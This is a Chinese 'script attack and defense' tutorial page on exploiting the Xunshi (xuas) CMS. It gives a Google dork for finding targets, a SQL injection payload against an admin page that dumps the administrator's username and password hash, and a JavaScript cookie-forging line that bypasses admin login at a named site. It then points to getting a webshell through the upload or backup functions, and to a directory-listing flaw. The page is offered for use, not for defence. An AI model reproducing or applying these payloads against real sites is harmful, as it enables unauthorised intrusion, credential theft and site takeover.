手机
当前位置:查字典教程网 > >脚本攻防 >讯时系统(xuas)最新通杀漏洞0day图文说明
讯时系统(xuas)最新通杀漏洞0day图文说明
摘要:google关键字:inurl:news_more.asp?lm2=(关键字很多的自己定义吧)1、/admin/admin_news_pl_...

google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)

1、/admin/admin_news_pl_view.asp?id=1

//id任意 填入以下语句

2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!

讯时系统(xuas)最新通杀漏洞0day图文说明1

3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

讯时系统(xuas)最新通杀漏洞0day图文说明2

爆出管理员帐号和密码了

讯时系统(xuas)最新通杀漏洞0day图文说明3

4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

讯时系统(xuas)最新通杀漏洞0day图文说明4

5、后台用了cookie验证,直接访问http://www.dxggw.cn/admin/admin_index.asp就OK了!

讯时系统(xuas)最新通杀漏洞0day图文说明5

6、后台有上传和备份取SHELL不难。

7、讯时还有个列目录漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!

【讯时系统(xuas)最新通杀漏洞0day图文说明】相关文章:

PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

phpcms SQL注入漏洞 adsclass.php 页面过滤不严

使用参数化查询防止SQL注入漏洞

Z-blog后台拿SHELL方法总结

分享PHP场景中getshell防御思路

Mysql语法绕过360scan insert防注入方法

万博企业网站管理系统注入漏洞(MemberLogin.asp)

dedecms官方模板包含一句话后门木马

serv-u最新通杀所有版本0day asp代码

webshell提权经验分享

精品推荐
分类导航